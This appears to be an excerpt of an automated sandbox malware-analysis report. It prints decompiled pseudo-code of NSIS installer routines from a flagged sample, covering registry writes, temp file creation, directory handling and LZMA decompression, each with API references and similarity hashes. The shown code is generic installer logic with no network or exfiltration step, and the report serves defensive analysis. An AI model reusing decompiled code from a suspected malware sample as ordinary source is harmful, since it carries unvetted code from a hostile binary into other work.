                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                        • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                        • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                        • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                        				void* _t20;
                                                                        				void* _t21;
                                                                        				int _t24;
                                                                        				long _t25;
                                                                        				char _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				intOrPtr _t33;
                                                                        				void* _t34;
                                                                        				intOrPtr _t37;
                                                                        				void* _t39;
                                                                        				void* _t42;
                                                                        
                                                                        				_t42 = __eflags;
                                                                        				_t33 = __edx;
                                                                        				_t30 = __ebx;
                                                                        				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                        				_t34 = __eax;
                                                                        				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                        				 *(_t39 - 0x44) = E00402DA6(2);
                                                                        				_t20 = E00402DA6(0x11);
                                                                        				 *(_t39 - 4) = 1;
                                                                        				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                        				 *(_t39 + 8) = _t21;
                                                                        				if(_t21 != __ebx) {
                                                                        					_t24 = 0;
                                                                        					if(_t37 == 1) {
                                                                        						E00402DA6(0x23);
                                                                        						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
                                                                        					}
                                                                        					if(_t37 == 4) {
                                                                        						_t27 = E00402D84(3);
                                                                        						_pop(_t32);
                                                                        						 *0x40b5f8 = _t27;
                                                                        						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                        						_t24 = _t37;
                                                                        					}
                                                                        					if(_t37 == 3) {
                                                                        						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800);
                                                                        					}
                                                                        					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
                                                                        					if(_t25 == 0) {
                                                                        						 *(_t39 - 4) = _t30;
                                                                        					}
                                                                        					_push( *(_t39 + 8));
                                                                        					RegCloseKey(); // executed
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                        				return 0;
                                                                        			}















                                                                        0x0040248a
                                                                        0x0040248a
                                                                        0x0040248a
                                                                        0x0040248a
                                                                        0x0040248d
                                                                        0x00402494
                                                                        0x0040249e
                                                                        0x004024a1
                                                                        0x004024aa
                                                                        0x004024b1
                                                                        0x004024b8
                                                                        0x004024bb
                                                                        0x004024c1
                                                                        0x004024cb
                                                                        0x004024cf
                                                                        0x004024da
                                                                        0x004024da
                                                                        0x004024e1
                                                                        0x004024e5
                                                                        0x004024ea
                                                                        0x004024eb
                                                                        0x004024f1
                                                                        0x004024f4
                                                                        0x004024f4
                                                                        0x004024f8
                                                                        0x00402504
                                                                        0x00402504
                                                                        0x00402515
                                                                        0x0040251d
                                                                        0x0040251f
                                                                        0x0040251f
                                                                        0x00402522
                                                                        0x004025fd
                                                                        0x004025fd
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp,00000000,00000011,00000002), ref: 00402515
                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseValuelstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp
                                                                        • API String ID: 2655323295-3263499576
                                                                        • Opcode ID: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
                                                                        • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                                        • Opcode Fuzzy Hash: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
                                                                        • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                        				intOrPtr _v8;
                                                                        				short _v12;
                                                                        				short _t12;
                                                                        				intOrPtr _t13;
                                                                        				signed int _t14;
                                                                        				WCHAR* _t17;
                                                                        				signed int _t19;
                                                                        				signed short _t23;
                                                                        				WCHAR* _t26;
                                                                        
                                                                        				_t26 = _a4;
                                                                        				_t23 = 0x64;
                                                                        				while(1) {
                                                                        					_t12 =  *L"nsa"; // 0x73006e
                                                                        					_t23 = _t23 - 1;
                                                                        					_v12 = _t12;
                                                                        					_t13 =  *0x40a5ac; // 0x61
                                                                        					_v8 = _t13;
                                                                        					_t14 = GetTickCount();
                                                                        					_t19 = 0x1a;
                                                                        					_v8 = _v8 + _t14 % _t19;
                                                                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                        					if(_t17 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t23 != 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						 *_t26 =  *_t26 & _t23;
                                                                        					}
                                                                        					L4:
                                                                        					return _t17;
                                                                        				}
                                                                        				_t17 = _t26;
                                                                        				goto L4;
                                                                        			}












                                                                        0x0040618d
                                                                        0x00406193
                                                                        0x00406194
                                                                        0x00406194
                                                                        0x00406199
                                                                        0x0040619a
                                                                        0x0040619d
                                                                        0x004061a2
                                                                        0x004061a5
                                                                        0x004061af
                                                                        0x004061bc
                                                                        0x004061c0
                                                                        0x004061c8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004061cc
                                                                        0x00000000
                                                                        0x004061ce
                                                                        0x004061ce
                                                                        0x004061ce
                                                                        0x004061d1
                                                                        0x004061d4
                                                                        0x004061d4
                                                                        0x004061d7
                                                                        0x00000000

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 004061A5
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-1857211195
                                                                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                        • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                        • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E004015C1(short __ebx, void* __eflags) {
                                                                        				void* _t17;
                                                                        				int _t23;
                                                                        				void* _t25;
                                                                        				signed char _t26;
                                                                        				short _t28;
                                                                        				short _t31;
                                                                        				short* _t34;
                                                                        				void* _t36;
                                                                        
                                                                        				_t28 = __ebx;
                                                                        				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                        				_t17 = E00405FE2(_t16);
                                                                        				_t32 = _t17;
                                                                        				if(_t17 != __ebx) {
                                                                        					do {
                                                                        						_t34 = E00405F64(_t32, 0x5c);
                                                                        						_t31 =  *_t34;
                                                                        						 *_t34 = _t28;
                                                                        						if(_t31 != _t28) {
                                                                        							L5:
                                                                        							_t25 = E00405C16( *(_t36 + 8));
                                                                        						} else {
                                                                        							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                        							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                                        								goto L5;
                                                                        							} else {
                                                                        								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                                        							}
                                                                        						}
                                                                        						if(_t25 != _t28) {
                                                                        							if(_t25 != 0xb7) {
                                                                        								L9:
                                                                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                        							} else {
                                                                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                        								if((_t26 & 0x00000010) == 0) {
                                                                        									goto L9;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						 *_t34 = _t31;
                                                                        						_t32 = _t34 + 2;
                                                                        					} while (_t31 != _t28);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                        					_push(0xfffffff5);
                                                                        					E00401423();
                                                                        				} else {
                                                                        					E00401423(0xffffffe6);
                                                                        					E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                        					if(_t23 == 0) {
                                                                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                        					}
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                        				return 0;
                                                                        			}











                                                                        0x004015c1
                                                                        0x004015c9
                                                                        0x004015cc
                                                                        0x004015d1
                                                                        0x004015d5
                                                                        0x004015d7
                                                                        0x004015df
                                                                        0x004015e1
                                                                        0x004015e4
                                                                        0x004015ea
                                                                        0x00401604
                                                                        0x00401607
                                                                        0x004015ec
                                                                        0x004015ec
                                                                        0x004015ef
                                                                        0x00000000
                                                                        0x004015fa
                                                                        0x004015fd
                                                                        0x004015fd
                                                                        0x004015ef
                                                                        0x0040160e
                                                                        0x00401615
                                                                        0x00401624
                                                                        0x00401624
                                                                        0x00401617
                                                                        0x0040161a
                                                                        0x00401622
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401622
                                                                        0x00401615
                                                                        0x00401627
                                                                        0x0040162b
                                                                        0x0040162c
                                                                        0x004015d7
                                                                        0x00401634
                                                                        0x00401663
                                                                        0x004022f1
                                                                        0x00401636
                                                                        0x00401638
                                                                        0x00401645
                                                                        0x0040164d
                                                                        0x00401655
                                                                        0x0040165b
                                                                        0x0040165b
                                                                        0x00401655
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,76F1FAA0,?,76F1F560,00405D94,?,76F1FAA0,76F1F560,00000000), ref: 00405FF0
                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                          • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 1892508949-1104044542
                                                                        • Opcode ID: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
                                                                        • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                        • Opcode Fuzzy Hash: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
                                                                        • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E0040603F(void* __eflags, intOrPtr _a4) {
                                                                        				int _t11;
                                                                        				signed char* _t12;
                                                                        				long _t16;
                                                                        				intOrPtr _t18;
                                                                        				intOrPtr* _t21;
                                                                        				signed int _t23;
                                                                        
                                                                        				E00406668(0x425f50, _a4);
                                                                        				_t21 = E00405FE2(0x425f50);
                                                                        				if(_t21 != 0) {
                                                                        					E004068EF(_t21);
                                                                        					if(( *0x42a278 & 0x00000080) == 0) {
                                                                        						L5:
                                                                        						_t23 = _t21 - 0x425f50 >> 1;
                                                                        						while(1) {
                                                                        							_t11 = lstrlenW(0x425f50);
                                                                        							_push(0x425f50);
                                                                        							if(_t11 <= _t23) {
                                                                        								break;
                                                                        							}
                                                                        							_t12 = E0040699E();
                                                                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                        								E00405F83(0x425f50);
                                                                        								continue;
                                                                        							} else {
                                                                        								goto L1;
                                                                        							}
                                                                        						}
                                                                        						E00405F37();
                                                                        						_t16 = GetFileAttributesW(??); // executed
                                                                        						return 0 | _t16 != 0xffffffff;
                                                                        					}
                                                                        					_t18 =  *_t21;
                                                                        					if(_t18 == 0 || _t18 == 0x5c) {
                                                                        						goto L1;
                                                                        					} else {
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        				L1:
                                                                        				return 0;
                                                                        			}









                                                                        0x0040604b
                                                                        0x00406056
                                                                        0x0040605a
                                                                        0x00406061
                                                                        0x0040606d
                                                                        0x0040607d
                                                                        0x0040607f
                                                                        0x00406097
                                                                        0x00406098
                                                                        0x0040609f
                                                                        0x004060a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406083
                                                                        0x0040608a
                                                                        0x00406092
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040608a
                                                                        0x004060a2
                                                                        0x004060a8
                                                                        0x00000000
                                                                        0x004060b6
                                                                        0x0040606f
                                                                        0x00406075
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406075
                                                                        0x0040605c
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,76F1FAA0,?,76F1F560,00405D94,?,76F1FAA0,76F1F560,00000000), ref: 00405FF0
                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                        • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,76F1FAA0,?,76F1F560,00405D94,?,76F1FAA0,76F1F560,00000000), ref: 00406098
                                                                        • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,76F1FAA0,?,76F1F560,00405D94,?,76F1FAA0,76F1F560), ref: 004060A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: P_B
                                                                        • API String ID: 3248276644-906794629
                                                                        • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                        • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                        • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                        • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 99%
                                                                        			E00407194() {
                                                                        				signed int _t530;
                                                                        				void _t537;
                                                                        				signed int _t538;
                                                                        				signed int _t539;
                                                                        				unsigned short _t569;
                                                                        				signed int _t579;
                                                                        				signed int _t607;
                                                                        				void* _t627;
                                                                        				signed int _t628;
                                                                        				signed int _t635;
                                                                        				signed int* _t643;
                                                                        				void* _t644;
                                                                        
                                                                        				L0:
                                                                        				while(1) {
                                                                        					L0:
                                                                        					_t530 =  *(_t644 - 0x30);
                                                                        					if(_t530 >= 4) {
                                                                        					}
                                                                        					 *(_t644 - 0x40) = 6;
                                                                        					 *(_t644 - 0x7c) = 0x19;
                                                                        					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                        					while(1) {
                                                                        						L145:
                                                                        						 *(_t644 - 0x50) = 1;
                                                                        						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                        						while(1) {
                                                                        							L149:
                                                                        							if( *(_t644 - 0x48) <= 0) {
                                                                        								goto L155;
                                                                        							}
                                                                        							L150:
                                                                        							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                        							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                        							 *(_t644 - 0x54) = _t643;
                                                                        							_t569 =  *_t643;
                                                                        							_t635 = _t569 & 0x0000ffff;
                                                                        							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                        							if( *(_t644 - 0xc) >= _t607) {
                                                                        								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                        								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                        								_t628 = _t627 + 1;
                                                                        								 *_t643 = _t569 - (_t569 >> 5);
                                                                        								 *(_t644 - 0x50) = _t628;
                                                                        							} else {
                                                                        								 *(_t644 - 0x10) = _t607;
                                                                        								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                        								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                        							}
                                                                        							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                        								L148:
                                                                        								_t487 = _t644 - 0x48;
                                                                        								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                        								L149:
                                                                        								if( *(_t644 - 0x48) <= 0) {
                                                                        									goto L155;
                                                                        								}
                                                                        								goto L150;
                                                                        							} else {
                                                                        								L154:
                                                                        								L146:
                                                                        								if( *(_t644 - 0x6c) == 0) {
                                                                        									L169:
                                                                        									 *(_t644 - 0x88) = 0x18;
                                                                        									L170:
                                                                        									_t579 = 0x22;
                                                                        									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                        									_t539 = 0;
                                                                        									L172:
                                                                        									return _t539;
                                                                        								}
                                                                        								L147:
                                                                        								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                        								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                        								_t484 = _t644 - 0x70;
                                                                        								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                        								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                        								goto L148;
                                                                        							}
                                                                        							L155:
                                                                        							_t537 =  *(_t644 - 0x7c);
                                                                        							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                        							while(1) {
                                                                        								L140:
                                                                        								 *(_t644 - 0x88) = _t537;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t538 =  *(_t644 - 0x88);
                                                                        									if(_t538 > 0x1c) {
                                                                        										break;
                                                                        									}
                                                                        									L2:
                                                                        									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                                        										case 0:
                                                                        											L3:
                                                                        											if( *(_t644 - 0x6c) == 0) {
                                                                        												goto L170;
                                                                        											}
                                                                        											L4:
                                                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                        											_t538 =  *( *(_t644 - 0x70));
                                                                        											if(_t538 > 0xe1) {
                                                                        												goto L171;
                                                                        											}
                                                                        											L5:
                                                                        											_t542 = _t538 & 0x000000ff;
                                                                        											_push(0x2d);
                                                                        											asm("cdq");
                                                                        											_pop(_t581);
                                                                        											_push(9);
                                                                        											_pop(_t582);
                                                                        											_t638 = _t542 / _t581;
                                                                        											_t544 = _t542 % _t581 & 0x000000ff;
                                                                        											asm("cdq");
                                                                        											_t633 = _t544 % _t582 & 0x000000ff;
                                                                        											 *(_t644 - 0x3c) = _t633;
                                                                        											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                        											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                        											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                        											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                        												L10:
                                                                        												if(_t641 == 0) {
                                                                        													L12:
                                                                        													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                        													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                        													goto L15;
                                                                        												} else {
                                                                        													goto L11;
                                                                        												}
                                                                        												do {
                                                                        													L11:
                                                                        													_t641 = _t641 - 1;
                                                                        													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                        												} while (_t641 != 0);
                                                                        												goto L12;
                                                                        											}
                                                                        											L6:
                                                                        											if( *(_t644 - 4) != 0) {
                                                                        												GlobalFree( *(_t644 - 4));
                                                                        											}
                                                                        											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                        											 *(_t644 - 4) = _t538;
                                                                        											if(_t538 == 0) {
                                                                        												goto L171;
                                                                        											} else {
                                                                        												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                        												goto L10;
                                                                        											}
                                                                        										case 1:
                                                                        											L13:
                                                                        											__eflags =  *(_t644 - 0x6c);
                                                                        											if( *(_t644 - 0x6c) == 0) {
                                                                        												L157:
                                                                        												 *(_t644 - 0x88) = 1;
                                                                        												goto L170;
                                                                        											}
                                                                        											L14:
                                                                        											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                        											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                        											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                        											_t45 = _t644 - 0x48;
                                                                        											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                        											__eflags =  *_t45;
                                                                        											L15:
                                                                        											if( *(_t644 - 0x48) < 4) {
                                                                        												goto L13;
                                                                        											}
                                                                        											L16:
                                                                        											_t550 =  *(_t644 - 0x40);
                                                                        											if(_t550 ==  *(_t644 - 0x74)) {
                                                                        												L20:
                                                                        												 *(_t644 - 0x48) = 5;
                                                                        												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                        												goto L23;
                                                                        											}
                                                                        											L17:
                                                                        											 *(_t644 - 0x74) = _t550;
                                                                        											if( *(_t644 - 8) != 0) {
                                                                        												GlobalFree( *(_t644 - 8));
                                                                        											}
                                                                        											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                        											 *(_t644 - 8) = _t538;
                                                                        											if(_t538 == 0) {
                                                                        												goto L171;
                                                                        											} else {
                                                                        												goto L20;
                                                                        											}
                                                                        										case 2:
                                                                        											L24:
                                                                        											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                        											 *(_t644 - 0x84) = 6;
                                                                        											 *(_t644 - 0x4c) = _t557;
                                                                        											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                        											goto L132;
